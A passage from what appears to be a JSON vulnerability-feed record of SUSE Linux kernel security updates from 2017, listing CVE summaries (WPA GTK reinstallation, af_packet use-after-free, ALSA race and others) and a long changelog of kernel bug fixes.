LTC#159112).\n - s390/qdio: avoid reschedule of outbound tasklet once killed\n (bnc#1063301, LTC#159885).\n - s390/topology: alternative topology for topology-less machines\n (bnc#1060245, LTC#159177).\n - s390/topology: enable / disable topology dynamically (bnc#1060245,\n LTC#159177).\n - scsi: qla2xxx: Get mutex lock before checking optrom_state (bsc#1053317).\n - scsi: reset wait for IO completion (bsc#996376).\n - scsi: zfcp: fix capping of unsuccessful GPN_FT SAN response trace\n records (bnc#1060245, LTC#158494).\n - scsi: zfcp: fix missing trace records for early returns in TMF eh\n handlers (bnc#1060245, LTC#158494).\n - scsi: zfcp: fix passing fsf_req to SCSI trace on TMF to correlate with\n HBA (bnc#1060245, LTC#158494).\n - scsi: zfcp: fix payload with full FCP_RSP IU in SCSI trace records\n (bnc#1060245, LTC#158494).\n - scsi: zfcp: fix queuecommand for scsi_eh commands when DIX enabled\n (bnc#1060245, LTC#158493).\n - scsi: zfcp: trace HBA FSF response by default on dismiss or timedout\n late response (bnc#1060245, LTC#158494).\n - Update config files. (bsc#1057796) The CONFIG_MODULE_SIG_UEFI should be\n enabled on x86_64/xen architecture because xen can work with shim on\n x86_64. Enabling the following kernel config to load certificate from\n db/mok: +CONFIG_MODULE_SIG_BLACKLIST=y +CONFIG_MODULE_SIG_UEFI=y\n - virtio_scsi: do not call virtqueue_add_sgs(... GFP_NOIO) holding\n spinlock (bsc#1036286).\n\n", "modified": "2017-11-30T21:08:12", "published": "2017-11-30T21:08:12", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-11/msg00082.html", "id": "SUSE-SU-2017:3165-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-12T19:01:14", "bulletinFamily": "unix", "description": "The SUSE Linux Enterprise 12 SP2 Realtime kernel was updated to 4.4.95 to\n receive various security and bugfixes.\n\n\n The following security bugs were fixed:\n\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in net/wireless/nl80211.c in the Linux\n kernel This function did not check whether the required attributes are\n present in a Netlink request. This request can be issued by a user with\n the CAP_NET_ADMIN capability and may result in a NULL pointer\n dereference and system crash (bnc#1058410 1058624).\n - CVE-2017-13080: Wi-Fi Protected Access (WPA and WPA2) allowed\n reinstallation of the Group Temporal Key (GTK) during the group key\n handshake, allowing an attacker within radio range to replay frames from\n access points to clients (bnc#1063667).\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel allowed local\n users to cause a denial of service (panic) by leveraging incorrect\n length validation (bnc#1059051).\n - CVE-2017-15265: Race condition in the ALSA subsystem in the Linux kernel\n allowed local users to cause a denial of service (use-after-free) or\n possibly have unspecified other impact via crafted /dev/snd/seq ioctl\n calls, related to sound/core/seq/seq_clientmgr.c and\n sound/core/seq/seq_ports.c (bnc#1062520).\n - CVE-2017-15649: net/packet/af_packet.c in the Linux kernel allowed local\n users to gain privileges via crafted system calls that trigger\n mishandling of packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that leads to a\n use-after-free, a different vulnerability than CVE-2017-6346\n (bnc#1064388).\n\n The following non-security bugs were fixed:\n\n - alsa: au88x0: avoid theoretical uninitialized access (bnc#1012382).\n - alsa: caiaq: Fix stray URB at probe error path (bnc#1012382).\n - alsa: compress: Remove unused variable (bnc#1012382).\n - alsa: hda: Remove superfluous '-' added by printk conversion\n (bnc#1012382).\n - alsa: line6: Fix leftover URB at error-path during probe (bnc#1012382).\n - alsa: seq: Enable 'use' locking in all configurations (bnc#1012382).\n - alsa: seq: Fix copy_from_user() call inside lock (bnc#1012382).\n - alsa: usb-audio: Add native DSD support for Pro-Ject Pre Box S2 Digital\n (bnc#1012382).\n - alsa: usb-audio: Check out-of-bounds access by corrupted buffer\n descriptor (bnc#1012382).\n - alsa: usb-audio: Kill stray URB at exiting (bnc#1012382).\n - alsa: usx2y: Suppress kernel warning at page allocation failures\n (bnc#1012382).\n - arc: Re-enable MMU upon Machine Check exception (bnc#1012382).\n - arm64: fault: Route pte translation faults via do_translation_fault\n (bnc#1012382).\n - arm64: Make sure SPsel is always set (bnc#1012382).\n - arm: 8635/1: nommu: allow enabling REMAP_VECTORS_TO_RAM (bnc#1012382).\n - arm: dts: r8a7790: Use R-Car Gen 2 fallback binding for msiof nodes\n (bnc#1012382).\n - arm: pxa: add the number of DMA requestor lines (bnc#1012382).\n - arm: pxa: fix the number of DMA requestor lines (bnc#1012382).\n - arm: remove duplicate 'const' annotations' (bnc#1012382).\n - asoc: dapm: fix some pointer error handling (bnc#1012382).\n - asoc: dapm: handle probe deferrals (bnc#1012382).\n - audit: log 32-bit socketcalls (bnc#1012382).\n - bcache: correct cache_dirty_target in __update_writeback_rate()\n (bnc#1012382).\n - bcache: Correct return value for sysfs attach errors (bnc#1012382).\n - bcache: do not subtract sectors_to_gc for bypassed IO (bnc#1012382).\n - bcache: fix bch_hprint crash and improve output (bnc#1012382).\n - bcache: fix for gc and write-back race (bnc#1012382).\n - bcache: Fix leak of bdev reference (bnc#1012382).\n - bcache: initialize dirty stripes in flash_dev_run() (bnc#1012382).\n - blacklist.conf: blacklisted 16af97dc5a89 (bnc#1053919)\n - block: Relax a check in blk_start_queue() (bnc#1012382).\n - bpf: one perf event close won't free bpf program attached by another\n perf event (bnc#1012382).\n - bpf/verifier: reject BPF_ALU64|BPF_END (bnc#1012382).\n - brcmfmac: add length check in brcmf_cfg80211_escan_handler()\n (bnc#1012382).\n - brcmfmac: setup passive scan if requested by user-space (bnc#1012382).\n - brcmsmac: make some local variables 'static const' to reduce stack size\n (bnc#1012382).\n - bridge: netlink: register netdevice before executing changelink\n (bnc#1012382).\n - bsg-lib: do not free job in bsg_prepare_job (bnc#1012382).\n - btrfs: add a node counter to each of the rbtrees (bsc#974590 bsc#1030061\n bsc#1022914 bsc#1017461).\n - btrfs: add cond_resched() calls when resolving backrefs (bsc#974590\n bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: allow backref search checks for shared extents (bsc#974590\n bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: backref, add tracepoints for prelim_ref insertion and merging\n (bsc#974590 bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: backref, add unode_aux_to_inode_list helper (bsc#974590\n bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: backref, cleanup __ namespace abuse (bsc#974590 bsc#1030061\n bsc#1022914 bsc#1017461).\n - btrfs: backref, constify some arguments (bsc#974590 bsc#1030061\n bsc#1022914 bsc#1017461).\n - btrfs: btrfs_check_shared should manage its own transaction (bsc#974590\n bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: change how we decide to commit transactions during flushing\n (bsc#1060197).\n - btrfs: clean up extraneous computations in add_delayed_refs (bsc#974590\n bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: constify tracepoint arguments (bsc#974590 bsc#1030061 bsc#1022914\n bsc#1017461).\n - btrfs: convert prelimary reference tracking to use rbtrees (bsc#974590\n bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: fix leak and use-after-free in resolve_indirect_refs (bsc#974590\n bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: fix NULL pointer dereference from free_reloc_roots()\n (bnc#1012382).\n - btrfs: prevent to set invalid default subvolid (bnc#1012382).\n - btrfs: propagate error to btrfs_cmp_data_prepare caller (bnc#1012382).\n - btrfs: qgroup: move noisy underflow warning to debugging build\n (bsc#1055755).\n - btrfs: remove ref_tree implementation from backref.c (bsc#974590\n bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: struct-funcs, constify readers (bsc#974590 bsc#1030061\n bsc#1022914 bsc#1017461).\n - bus: mbus: fix window size calculation for 4GB windows (bnc#1012382).\n - can: esd_usb2: Fix can_dlc value for received RTR, frames (bnc#1012382).\n - can: gs_usb: fix busy loop if no more TX context is available\n (bnc#1012382).\n - ceph: avoid panic in create_session_open_msg() if utsname() returns NULL\n (bsc#1061451).\n - ceph: check negative offsets in ceph_llseek() (bsc#1061451).\n - ceph: clean up unsafe d_parent accesses in build_dentry_path\n (bnc#1012382).\n - cifs: fix circular locking dependency (bsc#1064701).\n - cifs: Fix SMB3.1.1 guest authentication to Samba (bnc#1012382).\n - cifs: Reconnect expired SMB sessions (bnc#1012382).\n - cifs: release auth_key.response for reconnect (bnc#1012382).\n - clockevents/drivers/cs5535: Improve resilience to spurious interrupts\n (bnc#1012382).\n - cpufreq: CPPC: add ACPI_PROCESSOR dependency (bnc#1012382).\n - crypto: AF_ALG - remove SGL terminator indicator when chaining\n (bnc#1012382).\n - crypto: shash - Fix zero-length shash ahash digest crash (bnc#1012382).\n - crypto: talitos - Do not provide setkey for non hmac hashing algs\n (bnc#1012382).\n - crypto: talitos - fix sha224 (bnc#1012382).\n - crypto: xts - Add ECB dependency (bnc#1012382).\n - cxl: Fix driver use count (bnc#1012382).\n - direct-io: Prevent NULL pointer access in submit_page_section\n (bnc#1012382).\n - dmaengine: edma: Align the memcpy acnt array size with the transfer\n (bnc#1012382).\n - dmaengine: mmp-pdma: add number of requestors (bnc#1012382).\n - driver core: platform: Do not read past the end of "driver_override"\n buffer (bnc#1012382).\n - drivers: firmware: psci: drop duplicate const from psci_of_match\n (bnc#1012382).\n - drivers: hv: fcopy: restore correct transfer length (bnc#1012382).\n - drm: Add driver-private objects to atomic state (bsc#1055493).\n - drm/amdkfd: fix improper return value on error (bnc#1012382).\n - drm: bridge: add DT bindings for TI ths8135 (bnc#1012382).\n - drm/dp: Introduce MST topology state to track available link bandwidth\n (bsc#1055493).\n - drm_fourcc: Fix DRM_FORMAT_MOD_LINEAR #define (bnc#1012382).\n - drm/i915/bios: ignore HDMI on port A (bnc#1012382).\n - drm/nouveau/bsp/g92: disable by default (bnc#1012382).\n - drm/nouveau/mmu: flush tlbs before deleting page tables (bnc#1012382).\n - ext4: do not allow encrypted operations without keys (bnc#1012382).\n - ext4: fix incorrect quotaoff if the quota feature is enabled\n (bnc#1012382).\n - ext4: fix quota inconsistency during orphan cleanup for read-only mounts\n (bnc#1012382).\n - ext4: in ext4_seek_{hole,data}, return -ENXIO for negative offsets\n (bnc#1012382).\n - extcon: axp288: Use vbus-valid instead of -present to determine cable\n presence (bnc#1012382).\n - exynos-gsc: Do not swap cb/cr for semi planar formats (bnc#1012382).\n - f2fs: check hot_data for roll-forward recovery (bnc#1012382).\n - f2fs crypto: add missing locking for keyring_key access (bnc#1012382).\n - f2fs crypto: replace some BUG_ON()'s with error checks (bnc#1012382).\n - f2fs: do not wait for writeback in write_begin (bnc#1012382).\n - fix unbalanced page refcounting in bio_map_user_iov (bnc#1012382).\n - fix whitespace according to upstream commit\n - fix xen_swiotlb_dma_mmap prototype (bnc#1012382).\n - fs-cache: fix dereference of NULL user_key_payload (bnc#1012382).\n - fscrypt: fix dereference of NULL user_key_payload (bnc#1012382).\n - fscrypto: require write access to mount to set encryption policy\n (bnc#1012382).\n - fs/epoll: cache leftmost node (bsc#1056427).\n - ftrace: Fix kmemleak in unregister_ftrace_graph (bnc#1012382).\n - ftrace: Fix memleak when unregistering dynamic ops when tracing disabled\n (bnc#1012382).\n - ftrace: Fix selftest goto location on error (bnc#1012382).\n - genirq: Fix for_each_action_of_desc() macro (bsc#1061064).\n - getcwd: Close race with d_move called by lustre (bsc#1052593).\n - gfs2: Fix debugfs glocks dump (bnc#1012382).\n - gfs2: Fix reference to ERR_PTR in gfs2_glock_iter_next (bnc#1012382).\n - gianfar: Fix Tx flow control deactivation (bnc#1012382).\n - hid: i2c-hid: allocate hid buffers for real worst case (bnc#1012382).\n - hid: usbhid: Add HID_QUIRK_NOGET for Aten CS-1758 KVM switch\n (bnc#1022967).\n - hid: usbhid: fix out-of-bounds bug (bnc#1012382).\n - hpsa: correct lun data caching bitmap definition (bsc#1028971).\n - hwmon: (gl520sm) Fix overflows and crash seen when writing into limit\n attributes (bnc#1012382).\n - i2c: at91: ensure state is restored after suspending (bnc#1012382).\n - i2c: ismt: Separate I2C block read from SMBus block read (bnc#1012382).\n - i2c: meson: fix wrong variable usage in meson_i2c_put_data (bnc#1012382).\n - i40e: Initialize 64-bit statistics TX ring seqcount (bsc#969476\n FATE#319648 bsc#969477 FATE#319816).\n - i40iw: Add missing memory barriers (bsc#969476 FATE#319648 bsc#969477\n FATE#319816).\n - i40iw: Fix port number for query QP (bsc#969476 FATE#319648 bsc#969477\n FATE#319816).\n - ib/core: Fix for core panic (bsc#1022595 FATE#322350).\n - ib/core: Fix the validations of a multicast LID in attach or detach\n operations (bsc#1022595 FATE#322350).\n - ib/i40iw: Fix error code in i40iw_create_cq() (bsc#969476 FATE#319648\n bsc#969477 FATE#319816).\n - ib/ipoib: Fix deadlock over vlan_mutex (bnc#1012382).\n - ib/ipoib: Replace list_del of the neigh->list with list_del_init\n (bnc#1012382).\n - ib/ipoib: rtnl_unlock can not come after free_netdev (bnc#1012382).\n - ib/mlx5: Fix Raw Packet QP event handler assignment (bsc#966170\n FATE#320225 bsc#966172 FATE#320226).\n - ibmvnic: Set state UP (bsc#1062962).\n - ib/qib: fix false-postive maybe-uninitialized warning (bnc#1012382).\n - igb: re-assign hw address pointer on reset after PCI error (bnc#1012382).\n - iio: ad7793: Fix the serial interface reset (bnc#1012382).\n - iio: adc: axp288: Drop bogus AXP288_ADC_TS_PIN_CTRL register\n modifications (bnc#1012382).\n - iio: adc: hx711: Add DT binding for avia,hx711 (bnc#1012382).\n - iio: adc: mcp320x: Fix oops on module unload (bnc#1012382).\n - iio: adc: mcp320x: Fix readout of negative voltages (bnc#1012382).\n - iio: adc: twl4030: Disable the vusb3v1 rugulator in the error handling\n path of 'twl4030_madc_probe()' (bnc#1012382).\n - iio: adc: twl4030: Fix an error handling path in 'twl4030_madc_probe()'\n (bnc#1012382).\n - iio: adc: xilinx: Fix error handling (bnc#1012382).\n - iio: ad_sigma_delta: Implement a dedicated reset function (bnc#1012382).\n - iio: core: Return error for failed read_reg (bnc#1012382).\n - input: i8042 - add Gigabyte P57 to the keyboard reset table\n (bnc#1012382).\n - iommu/amd: Finish TLB flush in amd_iommu_unmap() (bnc#1012382).\n - iommu/io-pgtable-arm: Check for leaf entry before dereferencing it\n (bnc#1012382).\n - iommu/vt-d: Avoid calling virt_to_phys() on null pointer (bsc#1061067).\n - ip6_gre: skb_push ipv6hdr before packing the header in ip6gre_header\n (bnc#1012382).\n - ipv6: accept 64k - 1 packet length in ip6_find_1stfragopt()\n (bnc#1012382).\n - ipv6: add rcu grace period before freeing fib6_node (bnc#1012382).\n - ipv6: fix memory leak with multiple tables during netns destruction\n (bnc#1012382).\n - ipv6: fix sparse warning on rt6i_node (bnc#1012382).\n - ipv6: fix typo in fib6_net_exit() (bnc#1012382).\n - irqchip/crossbar: Fix incorrect type of local variables (bnc#1012382).\n - isdn/i4l: fetch the ppp_write buffer in one shot (bnc#1012382).\n - iwlwifi: add workaround to disable wide channels in 5GHz (bnc#1012382).\n - iwlwifi: mvm: use IWL_HCMD_NOCOPY for MCAST_FILTER_CMD (bnc#1012382).\n - ixgbe: Fix incorrect bitwise operations of PTP Rx timestamp flags\n (bsc#969474 FATE#319812 bsc#969475 FATE#319814).\n - kABI: protect struct l2tp_tunnel (kabi).\n - kABI: protect struct rm_data_op (kabi).\n - kABI: protect struct sdio_func (kabi).\n - keys: do not let add_key() update an uninstantiated key (bnc#1012382).\n - keys: encrypted: fix dereference of NULL user_key_payload (bnc#1012382).\n - keys: Fix race between updating and finding a negative key (bnc#1012382).\n - keys: fix writing past end of user-supplied buffer in keyring_read()\n (bnc#1012382).\n - keys: prevent creating a different user's keyrings (bnc#1012382).\n - keys: prevent KEYCTL_READ on negative key (bnc#1012382).\n - kvm: async_pf: Fix #DF due to inject "Page not Present" and "Page Ready"\n exceptions simultaneously (bsc#1061017).\n - kvm: nVMX: fix guest CR4 loading when emulating L2 to L1 exit\n (bnc#1012382).\n - kvm: PPC: Book3S: Fix race and leak in kvm_vm_ioctl_create_spapr_tce()\n (bnc#1012382).\n - kvm: SVM: Add a missing 'break' statement (bsc#1061017).\n - kvm: VMX: do not change SN bit in vmx_update_pi_irte() (bsc#1061017).\n - kvm: VMX: remove WARN_ON_ONCE in kvm_vcpu_trigger_posted_interrupt\n (bsc#1061017).\n - kvm: VMX: use cmpxchg64 (bnc#1012382).\n - l2tp: Avoid schedule while atomic in exit_net (bnc#1012382).\n - l2tp: fix race condition in l2tp_tunnel_delete (bnc#1012382).\n - libata: transport: Remove circular dependency at free time (bnc#1012382).\n - lib/digsig: fix dereference of NULL user_key_payload (bnc#1012382).\n - locking/lockdep: Add nest_lock integrity test (bnc#1012382).\n - lsm: fix smack_inode_removexattr and xattr_getsecurity memleak\n (bnc#1012382).\n - mac80211: fix power saving clients handling in iwlwifi (bnc#1012382).\n - mac80211: flush hw_roc_start work before cancelling the ROC\n (bnc#1012382).\n - mac80211_hwsim: check HWSIM_ATTR_RADIO_NAME length (bnc#1012382).\n - md/bitmap: disable bitmap_resize for file-backed bitmaps (bsc#1061172).\n - md/linear: shutup lockdep warnning (bnc#1012382).\n - md/raid10: submit bio directly to replacement disk (bnc#1012382).\n - md/raid5: preserve STRIPE_ON_UNPLUG_LIST in break_stripe_batch_list\n (bnc#1012382).\n - md/raid5: release/flush io in raid5_do_work() (bnc#1012382).\n - media: uvcvideo: Prevent heap overflow when accessing mapped controls\n (bnc#1012382).\n - media: v4l2-compat-ioctl32: Fix timespec conversion (bnc#1012382).\n - mips: Ensure bss section ends on a long-aligned address (bnc#1012382).\n - mips: Fix minimum alignment requirement of IRQ stack (git-fixes).\n - mips: IRQ Stack: Unwind IRQ stack onto task stack (bnc#1012382).\n - mips: Lantiq: Fix another request_mem_region() return code check\n (bnc#1012382).\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of both infinite inputs\n (bnc#1012382).\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of input values with\n opposite signs (bnc#1012382).\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix cases of both inputs zero\n (bnc#1012382).\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix quiet NaN propagation\n (bnc#1012382).\n - mips: math-emu: <MAX|MIN>.<D|S>: Fix cases of both inputs negative\n (bnc#1012382).\n - mips: math-emu: MINA.<D|S>: Fix some cases of infinity and zero inputs\n (bnc#1012382).\n - mips: math-emu: Remove pr_err() calls from fpu_emu() (bnc#1012382).\n - mips: ralink: Fix incorrect assignment on ralink_soc (bnc#1012382).\n - mlx5: Avoid that mlx5_ib_sg_to_klms() overflows the klms array\n (bsc#966170 FATE#320225 bsc#966172 FATE#320226).\n - mm/backing-dev.c: fix an error handling path in 'cgwb_create()'\n (bnc#1063475).\n - mm,compaction: serialize waitqueue_active() checks (for real)\n (bsc#971975).\n - mmc: sdio: fix alignment issue in struct sdio_func (bnc#1012382).\n - mm: discard memblock data later (bnc#1063460).\n - mm/memblock.c: reversed logic in memblock_discard() (bnc#1063460).\n - mm: meminit: mark init_reserved_page as __meminit (bnc#1063509).\n - mm/memory_hotplug: change pfn_to_section_nr/section_nr_to_pfn macro to\n inline function (bnc#1063501).\n - mm/memory_hotplug: define find_{smallest|biggest}_section_pfn as\n unsigned long (bnc#1063520).\n - mm: prevent double decrease of nr_reserved_highatomic (bnc#1012382).\n - net: core: Prevent from dereferencing null pointer when releasing SKB\n (bnc#1012382).\n - net: emac: Fix napi poll list corruption (bnc#1012382).\n - netfilter: invoke synchronize_rcu after set the _hook_ to NULL\n (bnc#1012382).\n - netfilter: nf_ct_expect: Change __nf_ct_expect_check() return value\n (bnc#1012382).\n - netfilter: nfnl_cthelper: fix incorrect helper->expect_class_max\n (bnc#1012382).\n - net/mlx4_core: Enable 4K UAR if SRIOV module parameter is not enabled\n (bsc#966191 FATE#320230 bsc#966186 FATE#320228).\n - net/mlx4_core: Fix VF overwrite of module param which disables DMFS on\n new probed PFs (bnc#1012382).\n - net/mlx4_en: fix overflow in mlx4_en_init_timestamp() (bnc#1012382).\n - net/mlx5e: Fix wrong delay calculation for overflow check scheduling\n (bsc#966170 FATE#320225 bsc#966172 FATE#320226).\n - net/mlx5e: Schedule overflow check work to mlx5e workqueue (bsc#966170\n FATE#320225 bsc#966172 FATE#320226).\n - net/mlx5: Skip mlx5_unload_one if mlx5_load_one fails (bsc#966170\n FATE#320225 bsc#966172 FATE#320226).\n - net: mvpp2: release reference to txq_cpu[] entry after unmapping\n (bnc#1012382).\n - net/packet: check length in getsockopt() called with PACKET_HDRLEN\n (bnc#1012382).\n - net: Set sk_prot_creator when cloning sockets to the right proto\n (bnc#1012382).\n - nfsd/callback: Cleanup callback cred on shutdown (bnc#1012382).\n - nfsd: Fix general protection fault in release_lock_stateid()\n (bnc#1012382).\n - nl80211: Define policy for packet pattern attributes (bnc#1012382).\n - nvme: protect against simultaneous shutdown invocations (FATE#319965\n bnc#1012382 bsc#964944).\n - packet: only test po->has_vnet_hdr once in packet_snd (bnc#1012382).\n - parisc: Avoid trashing sr2 and sr3 in LWS code (bnc#1012382).\n - parisc: Fix double-word compare and exchange in LWS code on 32-bit\n kernels (bnc#1012382).\n - parisc: perf: Fix potential NULL pointer dereference (bnc#1012382).\n - partitions/efi: Fix integer overflow in GPT size calculation\n (bnc#1012382).\n - pci: Allow PCI express root ports to find themselves (bsc#1061046).\n - pci: fix oops when try to find Root Port for a PCI device (bsc#1061046).\n - pci: Fix race condition with driver_override (bnc#1012382).\n - pci: shpchp: Enable bridge bus mastering if MSI is enabled (bnc#1012382).\n - percpu: make this_cpu_generic_read() atomic w.r.t. interrupts\n (bnc#1012382).\n - perf/x86: Fix RDPMC vs. mm_struct tracking (bsc#1061831).\n - perf/x86: kABI Workaround for 'perf/x86: Fix RDPMC vs. mm_struct\n tracking' (bsc#1061831).\n - pkcs7: Prevent NULL pointer dereference, since sinfo is not always set\n (bnc#1012382).\n - powerpc: Fix DAR reporting when alignment handler faults (bnc#1012382).\n - powerpc/pseries: Fix parent_dn reference leak in add_dt_node()\n (bnc#1012382).\n - qed: Fix stack corruption on probe (bsc#966318 FATE#320158 bsc#966316\n FATE#320159).\n - qlge: avoid memcpy buffer overflow (bnc#1012382).\n - rcu: Allow for page faults in NMI handlers (bnc#1012382).\n - rds: ib: add error handle (bnc#1012382).\n - rds: RDMA: Fix the composite message user notification (bnc#1012382).\n - Revert "bsg-lib: do not free job in bsg_prepare_job" (bnc#1012382).\n - Revert "net: fix percpu memory leaks" (bnc#1012382).\n - Revert "net: phy: Correctly process PHY_HALTED in phy_stop_machine()"\n (bnc#1012382).\n - Revert "net: use lib/percpu_counter API for fragmentation mem\n accounting" (bnc#1012382).\n - Revert "tty: goldfish: Fix a parameter of a call to free_irq"\n (bnc#1012382).\n - rtlwifi: rtl8821ae: Fix connection lost problem (bnc#1012382).\n - sched/autogroup: Fix autogroup_move_group() to never skip\n sched_move_task() (bnc#1012382).\n - sched/cpuset/pm: Fix cpuset vs. suspend-resume bugs (bnc#1012382).\n - scsi: hpsa: add 'ctlr_num' sysfs attribute (bsc#1028971).\n - scsi: hpsa: bump driver version (bsc#1022600 fate#321928).\n - scsi: hpsa: change driver version (bsc#1022600 bsc#1028971 fate#321928).\n - scsi: hpsa: Check for null device pointers (bsc#1028971).\n - scsi: hpsa: Check for null devices in ioaccel (bsc#1028971).\n - scsi: hpsa: Check for vpd support before sending (bsc#1028971).\n - scsi: hpsa: cleanup reset handler (bsc#1022600 fate#321928).\n - scsi: hpsa: correct call to hpsa_do_reset (bsc#1028971).\n - scsi: hpsa: correct logical resets (bsc#1028971).\n - scsi: hpsa: correct queue depth for externals (bsc#1022600 fate#321928).\n - scsi: hpsa: correct resets on retried commands (bsc#1022600 fate#321928).\n - scsi: hpsa: correct scsi 6byte lba calculation (bsc#1028971).\n - scsi: hpsa: Determine device external status earlier (bsc#1028971).\n - scsi: hpsa: do not get enclosure info for external devices (bsc#1022600\n fate#321928).\n - scsi: hpsa: do not reset enclosures (bsc#1022600 fate#321928).\n - scsi: hpsa: do not timeout reset operations (bsc#1022600 bsc#1028971\n fate#321928).\n - scsi: hpsa: fallback to use legacy REPORT PHYS command (bsc#1028971).\n - scsi: hpsa: fix volume offline state (bsc#1022600 bsc#1028971\n fate#321928).\n - scsi: hpsa: limit outstanding rescans (bsc#1022600 bsc#1028971\n fate#321928).\n - scsi: hpsa: Prevent sending bmic commands to externals (bsc#1028971).\n - scsi: hpsa: remove abort handler (bsc#1022600 fate#321928).\n - scsi: hpsa: remove coalescing settings for ioaccel2 (bsc#1028971).\n - scsi: hpsa: remove memory allocate failure message (bsc#1028971).\n - scsi: hpsa: Remove unneeded void pointer cast (bsc#1028971).\n - scsi: hpsa: rescan later if reset in progress (bsc#1022600 fate#321928).\n - scsi: hpsa: send ioaccel requests with 0 length down raid path\n (bsc#1022600 fate#321928).\n - scsi: hpsa: separate monitor events from rescan worker (bsc#1022600\n fate#321928).\n - scsi: hpsa: update check for logical volume status (bsc#1022600\n bsc#1028971 fate#321928).\n - scsi: hpsa: update identify physical device structure (bsc#1022600\n fate#321928).\n - scsi: hpsa: update pci ids (bsc#1022600 bsc#1028971 fate#321928).\n - scsi: hpsa: update reset handler (bsc#1022600 fate#321928).\n - scsi: hpsa: use designated initializers (bsc#1028971).\n - scsi: hpsa: use %phN for short hex dumps (bsc#1028971).\n - scsi: ILLEGAL REQUEST + ASC==27 => target failure (bsc#1059465).\n - scsi: libfc: fix a deadlock in fc_rport_work (bsc#1063695).\n - scsi: megaraid_sas: Check valid aen class range to avoid kernel panic\n (bnc#1012382).\n - scsi: megaraid_sas: Return pended IOCTLs with cmd_status\n MFI_STAT_WRONG_STATE in case adapter is dead (bnc#1012382).\n - scsi: reset wait for IO completion (bsc#996376).\n - scsi: scsi_dh_emc: return success in clariion_std_inquiry()\n (bnc#1012382).\n - scsi: scsi_transport_fc: Also check for NOTPRESENT in\n fc_remote_port_add() (bsc#1037890).\n - scsi: scsi_transport_fc: set scsi_target_id upon rescan (bsc#1058135).\n - scsi: sd: Do not override max_sectors_kb sysfs setting (bsc#1025461).\n - scsi: sd: Remove LBPRZ dependency for discards (bsc#1060985).\n - scsi: sg: close race condition in sg_remove_sfp_usercontext()\n (bsc#1064206).\n - scsi: sg: do not return bogus Sg_requests (bsc#1064206).\n - scsi: sg: factor out sg_fill_request_table() (bnc#1012382).\n - scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE (bnc#1012382).\n - scsi: sg: off by one in sg_ioctl() (bnc#1012382).\n - scsi: sg: only check for dxfer_len greater than 256M (bsc#1064206).\n - scsi: sg: remove 'save_scat_len' (bnc#1012382).\n - scsi: sg: use standard lists for sg_requests (bnc#1012382).\n - scsi: storvsc: fix memory leak on ring buffer busy (bnc#1012382).\n - scsi: zfcp: add handling for FCP_RESID_OVER to the fcp ingress path\n (bnc#1012382).\n - scsi: zfcp: fix capping of unsuccessful GPN_FT SAN response trace\n records (bnc#1012382).\n - scsi: zfcp: fix missing trace records for early returns in TMF eh\n handlers (bnc#1012382).\n - scsi: zfcp: fix passing fsf_req to SCSI trace on TMF to correlate with\n HBA (bnc#1012382).\n - scsi: zfcp: fix payload with full FCP_RSP IU in SCSI trace records\n (bnc#1012382).\n - scsi: zfcp: fix queuecommand for scsi_eh commands when DIX enabled\n (bnc#1012382).\n - scsi: zfcp: trace HBA FSF response by default on dismiss or timedout\n late response (bnc#1012382).\n - scsi: zfcp: trace high part of "new" 64 bit SCSI LUN (bnc#1012382).\n - sctp: potential read out of bounds in sctp_ulpevent_type_enabled()\n (bnc#1012382).\n - seccomp: fix the usage of get/put_seccomp_filter() in\n seccomp_get_filter() (bnc#1012382).\n - sh_eth: use correct name for ECMR_MPDE bit (bnc#1012382).\n - skd: Avoid that module unloading triggers a use-after-free (bnc#1012382).\n - skd: Submit requests to firmware before triggering the doorbell\n (bnc#1012382).\n - slub: do not merge cache if slub_debug contains a never-merge flag\n (bnc#1012382).\n - smb3: Do not ignore O_SYNC/O_DSYNC and O_DIRECT flags (bnc#1012382).\n - smb: Validate negotiate (to protect against downgrade) even if signing\n off (bnc#1012382).\n - sparc64: Migrate hvcons irq to panicked cpu (bnc#1012382).\n - staging: iio: ad7192: Fix - use the dedicated reset function avoiding\n dma from stack (bnc#1012382).\n - stm class: Fix a use-after-free (bnc#1012382).\n - supported.conf: mark hid-multitouch as supported (FATE#323670)\n - swiotlb-xen: implement xen_swiotlb_dma_mmap callback (bnc#1012382).\n - target/iscsi: Fix unsolicited data seq_end_offset calculation\n (bnc#1012382).\n - team: call netdev_change_features out of team lock (bsc#1055567).\n - team: fix memory leaks (bnc#1012382).\n - timer/sysclt: Restrict timer migration sysctl values to 0 and 1\n (bnc#1012382).\n - tipc: use only positive error codes in messages (bnc#1012382).\n - tpm_tis: Do not fall back to a hardcoded address for TPM2 (bsc#1020645,\n fate#321435, fate#321507, fate#321600, bsc#1034048).\n - tracing: Apply trace_clock changes to instance max buffer (bnc#1012382).\n - tracing: Erase irqsoff trace with empty write (bnc#1012382).\n - tracing: Fix trace_pipe behavior for instance traces (bnc#1012382).\n - ttpci: address stringop overflow warning (bnc#1012382).\n - tty: fix __tty_insert_flip_char regression (bnc#1012382).\n - tty: goldfish: Fix a parameter of a call to free_irq (bnc#1012382).\n - tty: improve tty_insert_flip_char() fast path (bnc#1012382).\n - tty: improve tty_insert_flip_char() slow path (bnc#1012382).\n - tun: bail out from tun_get_user() if the skb is empty (bnc#1012382).\n - uapi: fix linux/mroute6.h userspace compilation errors (bnc#1012382).\n - uapi: fix linux/rds.h userspace compilation errors 